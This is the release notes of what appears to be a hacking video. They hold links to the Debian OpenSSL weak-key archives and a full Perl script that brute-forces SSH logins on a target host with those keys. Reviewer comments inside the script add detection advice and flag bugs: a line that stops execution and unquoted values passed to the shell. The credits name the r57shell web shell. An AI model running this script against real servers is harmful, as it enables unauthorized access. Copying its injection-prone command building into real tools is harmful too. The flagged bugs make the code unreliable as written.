---------------------------------------------------------
--- Debian OpenSSL Bruteforce ---
author: F0rtress Zer0 (mail - last frame)
---------------------------------------------------------
music: Trent Reznor - Damnation (from quake)

Pre-generated keyfiles:
http://sugar.metasploit.com/debian_ssh_dsa_1024_x86.tar.bz2
http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2 <- THIS USED
http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 <- MIRROR
http://sugar.metasploit.com/debian_ssh_rsa_1023_x86.tar.bz2
http://sugar.metasploit.com/debian_ssh_rsa_1024_x86.tar.bz2
http://sugar.metasploit.com/debian_ssh_rsa_2047_x86.tar.bz2
http://sugar.metasploit.com/debian_ssh_rsa_4096_x86.tar.bz2
http://sugar.metasploit.com/debian_ssh_rsa_8192_1_4100_x86.tar.bz2

Brutforcer script code:
--- BEGIN ---
#!/usr/bin/perl
use strict;
use warnings;

## SSH keyfile bruteforce script
## Coded by Fortress Zero (nomina.sunt.odiosa@gmail.com)
#
# Reviewer summary: the script lists a directory of private key files, then
# runs the system `ssh` client repeatedly against one host and login, passing
# several `-i <keyfile>` identities per connection. It treats any ssh wait
# status other than 65280 as a hit and names the key file involved.
#
# Defensive context: per the page title, the key archives listed above are the
# pre-generated key sets for the Debian OpenSSL key-generation weakness. A
# public key from that set in any authorized_keys file has to be replaced;
# Debian and Ubuntu shipped `ssh-vulnkey` with their OpenSSH packages to find
# such keys. On the server side this activity shows up as a long run of failed
# publickey authentications for a single account from a single source address.

# Number of `-i` identities offered per ssh invocation.
# NOTE(review): presumably tied to the server's per-connection authentication
# attempt limit (sshd_config MaxAuthTries) -- the listing does not say.
my $keysPerConnect = 6;
my $usage = "\nUsage: ./script.pl \n";

# Three positional arguments, in order: key directory, target host, login name.
# None of them is validated before being used in a shell command below.
my $path = shift or die($usage."Path to keys is not specified\n");
my $host = shift or die($usage."Host is not specified\n");
my $login = shift or die($usage."Login is not specified\n");

# NOTE(review): `die` is the left-hand operand of `or`, so it is evaluated
# unconditionally; as published, execution stops at this statement.
die or chdir($path);

# Bareword directory handle; it is never closed in this listing.
opendir(A, $path) or die("\nerr: could not open dir\n");
print "\nCounting all keys...\n";
my @kez;
while ($_ = readdir(A)) {
    chomp;
    # filter only private keys
    # Keeps names made of word characters, one hyphen, then digits to the end
    # of the name; any name containing a dot (a `.pub` suffix, for instance)
    # does not match and is skipped.
    next unless m,^\w+-\d+$,;
    push(@kez, $_);
}
my $full = $#kez+1;
print "TOTAL ".$full." number of keys\n";
print "BRUTEFORCE attack start\n";

# Number of full batches; the remainder is handled one key at a time at the end.
my $cmdsCount = int($full/$keysPerConnect);

# The ssh command line is assembled by string concatenation and later passed
# to system() as ONE string, so it is interpreted by the shell. $login and
# $host go in unquoted and unvalidated: shell metacharacters in either are
# executed on the machine running this script. Key file names are limited to
# word characters and a hyphen by the filter above.
# BatchMode makes ssh fail instead of prompting for a password or passphrase.
my $pre_cmd = "ssh -o \"BatchMode yes\" -l ".$login;
# NOTE(review): the literal below spans a line break in this copy of the
# listing; it is preserved exactly as found because it is part of the string.
my $post_cmd = ' '.$host.' 
"id;exit"';
my $clock_start = time();
my $time_elapsed = 0;
my $time_left = 0;
for(my $i = 1; $i <= $cmdsCount; $i++){
    # Progress line: batch counter, elapsed time and a linear estimate of the
    # remaining time, both printed as hh:mm:ss through gmtime().
    $time_elapsed = time()-$clock_start;
    $time_left = int($time_elapsed/$i*($cmdsCount-$i));
    printf "%06d/%06d - %02d:%02d:%02d/%02d:%02d:%02d\n", $i, $cmdsCount,
        (gmtime($time_elapsed))[2], (gmtime($time_elapsed))[1], (gmtime($time_elapsed))[0],
        (gmtime($time_left))[2], (gmtime($time_left))[1], (gmtime($time_left))[0];

    # Take the next $keysPerConnect file names off the front of @kez and turn
    # them into a run of ` -i <name>` options.
    my $mid_cmd = '';
    for(my $j = 0; $j < $keysPerConnect; $j++){
        my $cur = shift(@kez);
        $mid_cmd.= " -i ".$cur;
    }
    my $ret = system($pre_cmd.$mid_cmd.$post_cmd);

    # 65280 is 255 << 8: the wait status of a child that exited with code 255,
    # which is what ssh returns for its own errors (connection or
    # authentication failure). Every other status counts as a hit here,
    # including -1 (command could not be started) and death by signal, which
    # is why the "false alarm" branch below exists.
    if($ret!=65280){
        ## seems that we've got shell
        # Recover the individual file names from the option string; the first
        # element produced by the split is dropped.
        my @valid = split ' -i ',$mid_cmd;
        shift @valid;
        print "Valid pack of keys found\n";
        print "Trying to determine correct key...\n";
        # Retry the batch one identity per connection to single out the key.
        foreach (@valid) {
            print $_."\n";
            my $ret2 = system($pre_cmd.' -i '.$_.$post_cmd);
            if($ret2!=65280){
                print "PRIVATE KEY FOUND\nTHIS IS IT -> ".$_." <-\n";
                # Terminates through die(), so the process exit status is
                # non-zero even though the message reports success.
                die("SUCCESS!!!!\n");
            }
        }
        print "Looks like false alarm...\n";
    }
}

# Fewer than $keysPerConnect names are left in @kez at this point; each one
# gets its own ssh invocation.
print "Small amount of keys remaining,\nTrying one-by-one\n";
foreach (@kez) {
    print $_."\n";
    my $ret3 = system($pre_cmd.' -i '.$_.$post_cmd);
    if($ret3!=65280){
        print "You fucking lucky!\n";
        print "PRIVATE KEY FOUND\nTHIS IS IT -> ".$_." <-\n";
        die("SUCCESS!!!!\n");
    }
}
print "SHIT! BRUTEFORCE FAILED!\n";
exit;
--- END ---

Software seen in video:
- Windows XP SP2
- OperaUSB 9.51
- r57shell 1.4
- portaputty
- Ubuntu 7.10

Software used for creation:
- MS Virtual PC 2007
- VMWare Player
- Ubuntu 7.10 (2 times)
- BB Flashback recorder 1.5.6
- Macromedia Flash MX 2004
- Nero WaveEditor 3.9.1.0
- Audacity 1.2.6
- DivX Codec
- LAME MP3 encoder/decoder
---
Hack the planet! Keep private! Cheat script-kiddies!
---
Hello gobzer! Hello Molot! Hello AFX! Hello flufx! Hello kostapc!
hello unknown from cc06 (nokia, your DVD) - contact me!
---
Fuck you Trash !!!(245659,982399,tgbr,92.245.59.233)
Antichat abused my video! I HATE YOU!
--- I know kung-foo You can now hire me for something legal - contact thru email